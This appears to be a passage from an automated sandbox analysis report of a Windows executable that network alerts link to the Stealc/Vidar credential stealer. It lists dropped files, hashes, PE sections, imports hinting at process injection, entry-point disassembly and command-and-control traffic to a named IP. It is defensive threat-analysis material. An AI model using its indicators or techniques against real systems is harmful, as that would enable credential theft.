Preview:	{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1930475688\b3fac72f-daf8-441c-abbc-955d76611a8c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 29 10:27:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.984591259496382
Encrypted:	false
SSDEEP:	48:8N0dQTUUPHb1OidAKZdA1oehwiZUklqehAy+3:8NjPP/y
MD5:	B93B8BE10E071A9D129A07B04B93A5CB
SHA1:	A602133914354DB72158623F22AA6884D0F199B6
SHA-256:	BDC22E233469C8F4E7E9FF2D6041BF7AE9C4A5ADA63054036523648142ED1C80
SHA-512:	A49EA2E3B5A6FE2A269722A7CA14B19A7CD80015FDDEF927C3455553D9F405CFE738C0CD11F5E7B0E6B2A394E2ABBA0FE8FA0C293B87AAEFA10C6B4BEA49EA03
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....q.QB..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I}Yr[....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V}Yr[....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V}Yr[....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V}Yr[..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V}Yu[...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............:J......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 29 10:27:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.998465582653033
Encrypted:	false
SSDEEP:	48:830dQTUUPHb1OidAKZdA1leh/iZUkAQkqehvy+2:83jPV9Qay
MD5:	52CFDFF2AAE96D23CD4CAA195A9044DB
SHA1:	3F5F9C735A5007BCDA2A20F64705DE9DA592C3C1
SHA-256:	CAF8BAB9CAD2D446137938BADE7100655517F316D93517A4529D743BE523CD7C
SHA-512:	163F1F24572B7A7F660C0A610C0E68779CB548920F818819C9607B786B2BC1B80F709E4A80F9B0C9200F5957189F5F1ED723DF3A857323909D7752EFFDD18E66
Malicious:	false
Preview:	L..................F.@.. ...$+.,....5.h.QB..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I}Yr[....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V}Yr[....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V}Yr[....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V}Yr[..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V}Yu[...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............:J......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.008914329787593
Encrypted:	false
SSDEEP:	48:8p0dQTUUbHb1OidAKZdA14t5eh7sFiZUkmgqeh7sZy+BX:8pjP5nby
MD5:	802C218F5DEC23667B3B7BF935E14816
SHA1:	476FE1D52C851FF66833B69665352592910E674D
SHA-256:	AF9A3848C123B12623443CF3F6C779E641C1E39AB31EF7A7A7B4F63D34FF20CB
SHA-512:	DE5F3CBC6F708F9466B0047ABC3C63745E8836E3E262FEBD3432CAC1273178DE4D450BABA31039D6A9BA5A032912CFBF6717FED8C17F8B3B2372678955C456D6
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....C..b...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I}Yr[....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V}Yr[....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V}Yr[....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V}Yr[..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VEW.@...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............:J......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 29 10:27:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.99853643763797
Encrypted:	false
SSDEEP:	48:8t0dQTUUPHb1OidAKZdA16ehDiZUkwqehTy+R:8tjPGRy
MD5:	21EB046F6893277103F73E2927E2ECDD
SHA1:	A877DC0B982D197034851C946B259B55480516A4
SHA-256:	3DAF533E9B6F3D7A06232388EF95F8B512D1A46E29EBA88FBE98D182BD4041C2
SHA-512:	D63E61BE9112CD931851CD4ADFF6DDF47442180BFF0A72614404D3937A857513EB0B0F28501AEDFF8215BC00840C197E2343417EC7E328D265C567336D0D0C08
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....~^.QB..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I}Yr[....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V}Yr[....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V}Yr[....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V}Yr[..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V}Yu[...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............:J......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 29 10:27:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9871220429116754
Encrypted:	false
SSDEEP:	48:890dQTUUPHb1OidAKZdA1UehBiZUk1W1qehFy+C:89jPG9ly
MD5:	08FE7A030C877DA3E5129E6CD28CE211
SHA1:	38A7BE9D9B9459F72695B971D51872B7E226D3E3
SHA-256:	2C8FC6913B9B6E9DD98F86B1F6420E0887B2F207762E47ACFCE3C9DA1BEED2A4
SHA-512:	E67A01C2DBCA4000C8BFDF2806C3B8ADC01A1D9BADE466837072C0B9F5C0E851A5A4967A5827F7A58A7A3EC38845AFAE3A6695B9B6230B72B01B8F6A82417996
Malicious:	false
Preview:	L..................F.@.. ...$+.,......l.QB..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I}Yr[....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V}Yr[....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V}Yr[....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V}Yr[..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V}Yu[...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............:J......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Nov 29 10:27:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9955941487457443
Encrypted:	false
SSDEEP:	48:8V0dQTUUPHb1OidAKZdA1duTrehOuTbbiZUk5OjqehOuTbby+yT+:8VjPXTYTbxWOvTbby7T
MD5:	566B3E4B6768C8013028DDD7CC96AA7E
SHA1:	09C16C4CDDABAC0C7B785C74F70273A719A2A0B3
SHA-256:	8FD42FE5E46F3C33DF906741FAF5930C2A84B8C8CDF954E531A0103A3D6314DA
SHA-512:	006433E0B3684CA385F32B6C9EB7FD64370F5109AC475BB0230F132731B36340C564E01BE1C92E4FD18DEE38733DCBED6C1EE2A3B3EFC06352ED80D42E0D780A
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....WW.QB..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I}Yr[....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V}Yr[....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V}Yr[....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V}Yr[..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V}Yu[...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............:J......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 482

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (810)
Category:	downloaded
Size (bytes):	815
Entropy (8bit):	5.130009375711741
Encrypted:	false
SSDEEP:	24:FadqN87NlyBHslgT9lCuABuyluF7HHHHHHHYqmffffffo:FQqNpKlgZ01BuouFEqmffffffo
MD5:	F8671B885522DF0AD9930E508AE74B71
SHA1:	75F66F2ECD43D9B4B0E68087A1B5B4D9BDD0B282
SHA-256:	448860724F3975E8DB40635134B67B168CC001D19A976B297ED51AA5A023E6FA
SHA-512:	CAC90EBAFC26ADC657A97DE7CC95A70CEC724705666312C712F9AA20FA6C5C07B1897A821A76CE1DE1E72904936B67C6E6ED631E94BAB1E327DACD5B9498EA95
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["eggs recalled salmonella costco","fantasy football start em sit em week 13","vito the pug national dog show","fisch codes roblox","russian ruble exchange rate","thanksgiving weather forecast","radio city rockettes","thanksgiving weather forecast snow storm"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1254,1253,1252,1251,1250,601,600,550],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Chrome Cache Entry: 483

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.232328956245138
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	419'328 bytes
MD5:	2d79aec368236c7741a6904e9adff58f
SHA1:	c0b6133df7148de54f876473ba1c64cb630108c1
SHA256:	b33f25c28bf15a787d41472717270301071af4f10ec93fa064c96e1a33455c35
SHA512:	022c5d135f66bc253a25086a2e9070a1ae395bdedd657a7a5554563dace75e1cbfe77c87033d6908d72deeab4a53f50e8bd202c4f6d6a9f17a19a9ebfdfe9538
SSDEEP:	6144:zhk7s+AfJjoF3U5w81tLffIru6t1tztD675DoRK3L9YhZmdC/0fNpZH97ndaW9:P+UJjoF3U5w8rk8LeYvR97nQW
TLSH:	B6947B5236A2CDF8D29084BF048E9BBC1F5A89D6BFC0A2D37594D89E5D792C7443234E
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&EDg.................R........................@...........................&..............................................?.....

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x43c8e6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NO_ISOLATION, TERMINAL_SERVER_AWARE
Time Stamp:	0x67444526 [Mon Nov 25 09:36:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	81961373b32efd4098659dcd8637f4f9

Entrypoint Preview

Instruction
je 00007FAF487CF5C5h
jne 00007FAF487CF5C3h
mov eax, FD32CBE8h
push dword ptr [ebx+eax+75h]
add dword ptr [eax+002463E8h], edi
add byte ptr [ebx+eax+75h], dh
add dword ptr [eax-03B63818h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-03B28E18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-03B2B618h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-03B01518h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-03B23718h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-00573218h], edi
push dword ptr [ecx]
rol dl, 00000010h
add ah, cl
int3
int3
int3
int3
cmp byte ptr [00662639h], 00000000h
jne 00007FAF487CF669h
mov ecx, dword ptr [esp+08h]
mov eax, dword ptr [esp+04h]
movzx edx, byte ptr [ecx]
xor dl, byte ptr [ecx+17h]
mov byte ptr [eax], dl
movzx edx, byte ptr [ecx+01h]
xor dl, byte ptr [ecx+18h]
mov byte ptr [eax+01h], dl
movzx edx, byte ptr [ecx+02h]
xor dl, byte ptr [ecx+19h]
mov byte ptr [eax+02h], dl
movzx edx, byte ptr [ecx+03h]
xor dl, byte ptr [ecx+1Ah]
mov byte ptr [eax+03h], dl
movzx edx, byte ptr [ecx+04h]
xor dl, byte ptr [ecx+1Bh]
mov byte ptr [eax+04h], dl
movzx edx, byte ptr [ecx+05h]
xor dl, byte ptr [ecx+1Ch]
mov byte ptr [eax+05h], dl
movzx edx, byte ptr [ecx+06h]
xor dl, byte ptr [ecx+1Dh]
mov byte ptr [eax+06h], dl
movzx edx, byte ptr [ecx+07h]
xor dl, byte ptr [ecx+1Eh]
mov byte ptr [eax+07h], dl
movzx edx, byte ptr [ecx+08h]
xor dl, byte ptr [ecx+1Fh]
mov byte ptr [eax+08h], dl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x53f80	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x264000	0x8f04	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x47048	0x5c	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x541cc	0x198	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x45180	0x45200	f9247c2536b2170f6abe72f01c787f20	False	0.3527103582730561	data	6.827864387265423	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x47000	0xda00	0xda00	12226c4dbb39a2a14f47ed6a0264b37d	False	0.953949254587156	data	7.899128371101482	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x55000	0x20d71c	0xa400	db256a1da441fadf9047dd916aa3771a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.00cfg	0x263000	0x4	0x200	aad0a28f62bfe943bb7b020a85d71ccc	False	0.03125	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x264000	0x8f04	0x9000	6c66a364c5fc89a7b386015024a3a9ac	False	0.5325520833333334	data	6.688903422470168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	CloseHandle, CreateDirectoryA, CreateFileA, CreateProcessA, CreateThread, ExitProcess, FileTimeToSystemTime, FindClose, FindFirstFileA, FindNextFileA, GetComputerNameA, GetCurrentProcess, GetDriveTypeA, GetFileInformationByHandle, GetFileSize, GetLocalTime, GetLogicalDriveStringsA, GetLogicalProcessorInformationEx, GetModuleHandleA, GetProcessHeap, GetThreadContext, GetTickCount, HeapAlloc, HeapFree, OpenProcess, RaiseException, ReadFile, ReadProcessMemory, SetFilePointer, SetThreadContext, Sleep, SystemTimeToFileTime, VirtualAlloc, VirtualAllocEx, VirtualAllocExNuma, VirtualFree, VirtualQueryEx, WaitForSingleObject, WriteFile, WriteProcessMemory, lstrcatA, lstrcmpiW, lstrcpyA, lstrlenA
msvcrt.dll	??2@YAPAXI@Z, ??3@YAXPAX@Z, ??_U@YAPAXI@Z, ??_V@YAXPAX@Z, _splitpath, atexit, free, isupper, malloc, memchr, memcmp, memcpy, memmove, memset, rand, srand, strchr, strcmp, strcpy, strcpy_s, strlen, strncpy, strstr, strtok_s
USER32.dll	CharToOemA, CloseDesktop, CreateDesktopA, GetDesktopWindow, OpenDesktopA, wsprintfA, wsprintfW
ADVAPI32.dll	GetCurrentHwProfileA, GetUserNameA, RegGetValueA, RegOpenKeyExA
api-ms-win-crt-runtime-l1-1-0.dll	_invalid_parameter_noinfo_noreturn
SHELL32.dll	SHFileOperationA, SHGetFolderPathA
WS2_32.dll	WSACleanup, WSAStartup, closesocket, connect, freeaddrinfo, getaddrinfo, htons, recv, send, socket
SHLWAPI.dll	PathFileExistsA

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-29T12:27:30.842100+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.8	49710	95.217.25.228	443	TCP
2024-11-29T12:27:30.842320+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	95.217.25.228	443	192.168.2.8	49710	TCP
2024-11-29T12:27:33.310678+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	95.217.25.228	443	192.168.2.8	49711	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2024 12:27:11.573162079 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:11.576459885 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:11.586555958 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:11.633327961 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:11.696511030 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:11.776345015 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:11.779664040 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:11.782089949 CET	443	49705	13.107.246.63	192.168.2.8
Nov 29, 2024 12:27:11.782160997 CET	49705	443	192.168.2.8	13.107.246.63
Nov 29, 2024 12:27:11.782191992 CET	443	49705	13.107.246.63	192.168.2.8
